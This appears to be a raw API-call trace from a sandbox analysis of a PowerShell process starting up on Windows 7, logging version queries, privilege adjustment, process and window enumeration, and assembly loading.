	[0088.768] lstrcpyW (in: lpString1=0x27bec0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0088.768] CoTaskMemFree (pv=0x27bec0) 
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x2d57464, puLen=0x18da10) returned 1
	[0088.768] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0088.768] CoTaskMemAlloc (cb=0x66) returned 0x283d90
	[0088.768] lstrcpyW (in: lpString1=0x283d90, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0088.768] CoTaskMemFree (pv=0x283d90) 
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x0, puLen=0x18da10) returned 0
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x0, puLen=0x18da10) returned 0
	[0088.768] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x18da18, puLen=0x18da10 | out: lplpBuffer=0x18da18*=0x0, puLen=0x18da10) returned 0
	[0088.769] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x18d9e8, puLen=0x18d9e0 | out: lplpBuffer=0x18d9e8*=0x2d5740c, puLen=0x18d9e0) returned 1
	[0088.769] CoTaskMemAlloc (cb=0x204) returned 0x218bd0
	[0088.769] VerLanguageNameW (in: wLang=0x0, szLang=0x218bd0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0088.770] CoTaskMemFree (pv=0x218bd0) 
	[0088.771] VerQueryValueW (in: pBlock=0x2d57370, lpSubBlock="\\", lplpBuffer=0x18da38, puLen=0x18da30 | out: lplpBuffer=0x18da38*=0x2d57398, puLen=0x18da30) returned 1
	[0088.776] GetCurrentProcessId () returned 0x568
	[0088.790] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x18c960 | out: lpLuid=0x18c960*(LowPart=0x14, HighPart=0)) returned 1
	[0088.995] GetCurrentProcess () returned 0xffffffffffffffff
	[0088.996] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0x18c980 | out: TokenHandle=0x18c980*=0x2f0) returned 1
	[0088.996] AdjustTokenPrivileges (in: TokenHandle=0x2f0, DisableAllPrivileges=0, NewState=0x2d5abe8*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0088.998] CloseHandle (hObject=0x2f0) returned 1
	[0089.001] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x568) returned 0x2f0
	[0089.009] EnumProcessModules (in: hProcess=0x2f0, lphModule=0x2d5ac50, cb=0x200, lpcbNeeded=0x18d998 | out: lphModule=0x2d5ac50, lpcbNeeded=0x18d998) returned 1
	[0089.012] GetModuleInformation (in: hProcess=0x2f0, hModule=0x13ff20000, lpmodinfo=0x2d5aec0, cb=0x18 | out: lpmodinfo=0x2d5aec0*(lpBaseOfDll=0x13ff20000, SizeOfImage=0x77000, EntryPoint=0x13ff2c63c)) returned 1
	[0089.012] CoTaskMemAlloc (cb=0x804) returned 0x287ea0
	[0089.013] GetModuleBaseNameW (in: hProcess=0x2f0, hModule=0x13ff20000, lpBaseName=0x287ea0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0089.013] CoTaskMemFree (pv=0x287ea0) 
	[0089.015] CoTaskMemAlloc (cb=0x804) returned 0x287ea0
	[0089.015] GetModuleFileNameExW (in: hProcess=0x2f0, hModule=0x13ff20000, lpFilename=0x287ea0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0089.015] CoTaskMemFree (pv=0x287ea0) 
	[0089.016] CloseHandle (hObject=0x2f0) returned 1
	[0089.024] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x568) returned 0x2f0
	[0089.025] GetExitCodeProcess (in: hProcess=0x2f0, lpExitCode=0x18dac8 | out: lpExitCode=0x18dac8*=0x103) returned 1
	[0089.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12d5b088, Length=0x20000, ResultLength=0x18da90 | out: SystemInformation=0x12d5b088, ResultLength=0x18da90*=0x114c8) returned 0x0
	[0089.254] EnumWindows (lpEnumFunc=0x2b866ac, lParam=0x0) returned 1
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x50212, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x400b8, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x400c4, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x334
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x324
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x10076, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.255] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x10078, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x45c
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x5009a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x1008c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x101be, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x914
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x3023a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x40c
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x60230, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xbdc
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x30234, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x8f0
	[0089.256] GetWindowThreadProcessId (in: hWnd=0x800aa, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xb8c
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x50228, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5e0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x5021c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x90
	[0089.257] GetWindowThreadProcessId (in: hWnd=0xa00a4, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x400d6, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x400fa, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x500d2, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x400bc, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x400c8, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x500d8, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x400b0, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x4021a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x840
	[0089.257] GetWindowThreadProcessId (in: hWnd=0x3021e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x844
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x401f6, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x46c
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x10214, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xb40
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x40116, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x914
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x700d4, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x988
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x101ee, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x914
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x201b8, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x950
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x914
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x201a8, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x914
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x201aa, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x868
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x850
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x830
	[0089.258] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x814
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x744
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x2a8
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x534
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5e4
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5c4
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x58c
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x238
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x584
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x7e8
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x678
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x35c
	[0089.259] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x51c
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x360
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x1015a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x274
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x588
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x20152, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xc8
	[0089.260] GetWindowThreadProcessId (in: hWnd=0xa010a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x21c
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x3014e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5ec
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x10144, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x334
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x664
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x20138, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x334
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x664
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x10124, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x334
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x1011a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5ec
	[0089.260] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5ec
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x550
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x7a0
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x6009c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x594
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x564
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x45c
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x548
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x5008e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x518
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x10068, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.261] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x508
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4ec
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x1004c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x45c
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x20040, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x45c
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x3003e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x44c
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x7ec
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x100ee, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x45c
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x10134, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x324
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x1004e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4a0
	[0089.262] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x914
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x2019e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x914
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x50232, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x40c
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x30236, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xb0
	[0089.263] GetWindowThreadProcessId (in: hWnd=0xb0190, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x804
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x800ce, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xbc8
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x701f2, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x854
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x501f4, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x140
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x30218, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x55c
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x30222, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x34c
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xb40
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x201f8, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x988
	[0089.263] GetWindowThreadProcessId (in: hWnd=0x101b0, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x868
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x201ac, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x850
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x830
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x814
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x744
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x2a8
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x534
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5e4
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5c4
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x58c
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x238
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x584
	[0089.264] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x7e8
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x678
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x35c
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x51c
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x360
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x274
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x588
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x80150, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0xc8
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x400a0, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x21c
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x1012e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x664
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x334
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x5ec
	[0089.265] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x550
	[0089.266] GetWindowThreadProcessId (in: hWnd=0x20016, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x7a0
	[0089.266] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x594
	[0089.266] GetWindowThreadProcessId (in: hWnd=0x10106, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x45c
	[0089.266] GetWindowThreadProcessId (in: hWnd=0x10112, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x508
	[0089.266] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x4ec
	[0089.266] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x45c
	[0089.266] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x18d7f0 | out: lpdwProcessId=0x18d7f0) returned 0x7ec
	[0089.269] WerSetFlags () returned 0x0
	[0089.276] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0089.574] CoTaskMemFree (pv=0x0) 
	[0089.575] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18db58, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18db50 | out: pulNumLanguages=0x18db58, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x18db50) returned 1
	[0089.575] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x18db58, pwszLanguagesBuffer=0x2d81e40, pcchLanguagesBuffer=0x18db50 | out: pulNumLanguages=0x18db58, pwszLanguagesBuffer=0x2d81e40, pcchLanguagesBuffer=0x18db50) returned 1
	[0089.580] CoTaskMemAlloc (cb=0x24) returned 0x27be30
	[0089.580] GetUserDefaultLocaleName (in: lpLocaleName=0x27be30, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0089.580] CoTaskMemFree (pv=0x27be30) 
	[0089.605] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0089.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.605] CoTaskMemFree (pv=0x235590) 
	[0089.607] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0089.607] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.607] CoTaskMemFree (pv=0x235590) 
	[0089.609] CoTaskMemAlloc (cb=0x104) returned 0x235590
	[0089.609] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x235590, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0089.609] CoTaskMemFree (pv=0x235590) 
	[0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x18d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0089.864] SetErrorMode (uMode=0x1) returned 0x1
